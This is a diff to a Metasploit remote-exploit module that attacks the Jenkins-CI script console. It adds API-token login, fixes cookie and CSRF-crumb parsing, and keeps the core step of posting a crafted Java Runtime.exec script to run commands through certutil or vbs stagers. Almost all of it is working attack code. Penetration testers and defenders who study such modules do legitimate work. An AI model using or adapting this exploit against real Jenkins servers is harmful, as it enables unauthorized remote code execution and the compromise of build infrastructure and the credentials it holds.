@@ -1,10 +1,8 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = GoodRanking
 
@@ -21,7 +19,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'Author'	=>
         [
           'Spencer McIntyre',
-          'jamcut'
+          'jamcut',
+          'thesubtlety'
         ],
       'License'        => MSF_LICENSE,
       'DefaultOptions' =>
@@ -37,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
         [
           ['Windows',
             {
-              'Arch' => [ ARCH_X86_64, ARCH_X86 ],
+              'Arch' => [ ARCH_X64, ARCH_X86 ],
               'Platform' => 'win',
               'CmdStagerFlavor' => [ 'certutil', 'vbs' ]
             }
@@ -52,8 +51,9 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptString.new('USERNAME',  [ false, 'The username to authenticate as', '' ]),
         OptString.new('PASSWORD',  [ false, 'The password for the specified username', '' ]),
+        OptString.new('API_TOKEN',  [ false, 'The API token for the specified username', '' ]),
         OptString.new('TARGETURI', [ true,  'The path to the Jenkins-CI application', '/jenkins/' ])
-      ], self.class)
+      ])
   end
 
   def check
@@ -79,6 +79,7 @@ class MetasploitModule < Msf::Exploit::Remote
     request_parameters = {
       'method'    => 'POST',
       'uri'       => normalize_uri(@uri.path, 'script'),
+      'authorization' => basic_auth(datastore['USERNAME'], datastore['API_TOKEN']),
       'vars_post' =>
         {
           'script' => java_craft_runtime_exec(cmd),
@@ -153,26 +154,42 @@ class MetasploitModule < Msf::Exploit::Remote
     @cookie = nil
     @crumb = nil
     if res.code != 200
-      print_status('Logging in...')
-      res = send_request_cgi({
-        'method'    => 'POST',
-        'uri'       => normalize_uri(@uri.path, "j_acegi_security_check"),
-        'vars_post' =>
-          {
-            'j_username' => datastore['USERNAME'],
-            'j_password' => datastore['PASSWORD'],
-            'Submit'     => 'log in'
-          }
-      })
+       if !datastore['API_TOKEN'].empty?
+          print_status('Authenticating with token...')
+          res = send_request_cgi({
+            'method'    => 'GET',
+            'uri'       => normalize_uri(@uri.path, "crumbIssuer/api/json"),
+            'authorization' => basic_auth(datastore['USERNAME'], datastore['API_TOKEN'])
+          })
+          if (res and res.code == 401)
+            fail_with(Failure::NoAccess, 'Login failed')
+          end
+       else
+          print_status('Logging in...')
+          res = send_request_cgi({
+            'method'    => 'POST',
+            'uri'       => normalize_uri(@uri.path, "j_acegi_security_check"),
+            'vars_post' =>
+              {
+                'j_username' => datastore['USERNAME'],
+                'j_password' => datastore['PASSWORD'],
+                'Submit'     => 'log in'
+              }
+          })
 
-      if not (res and res.code == 302) or res.headers['Location'] =~ /loginError/
-        fail_with(Failure::NoAccess, 'Login failed')
-      end
-      sessionid = 'JSESSIONID' << res.get_cookies.split('JSESSIONID')[1].split('; ')[0]
-      @cookie = "#{sessionid}"
+          if not (res and res.code == 302) or res.headers['Location'] =~ /loginError/
+            fail_with(Failure::NoAccess, 'Login failed')
+          end
+          if res.get_cookies.split('JSESSIONID').count > 2
+            sessionid = 'JSESSIONID' << res.get_cookies.split('JSESSIONID')[2].split('; ')[0]
+          else
+            sessionid = 'JSESSIONID' << res.get_cookies.split('JSESSIONID')[1].split('; ')[0]
+          end
+          @cookie = "#{sessionid}"
 
-      res = send_request_cgi({'uri' => "#{@uri.path}script", 'cookie' => @cookie})
-      fail_with(Failure::UnexpectedReply, 'Unexpected reply from server') unless res and res.code == 200
+          res = send_request_cgi({'uri' => "#{@uri.path}script", 'cookie' => @cookie})
+          fail_with(Failure::UnexpectedReply, 'Unexpected reply from server') unless res and res.code == 200
+       end
     else
       print_status('No authentication required, skipping login...')
     end
@@ -180,7 +197,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if res.body =~ /"\.crumb", "([a-z0-9]*)"/
       print_status("Using CSRF token: '#{$1}' (.crumb style)")
       @crumb = {:name => '.crumb', :value => $1}
-    elsif res.body =~ /crumb\.init\("Jenkins-Crumb", "([a-z0-9]*)"\)/
+    elsif res.body =~ /crumb\.init\("Jenkins-Crumb", "([a-z0-9]*)"\)/ || res.body =~ /"crumb":"([a-z0-9]*)"/
       print_status("Using CSRF token: '#{$1}' (Jenkins-Crumb style)")
       @crumb = {:name => 'Jenkins-Crumb', :value => $1}
     end
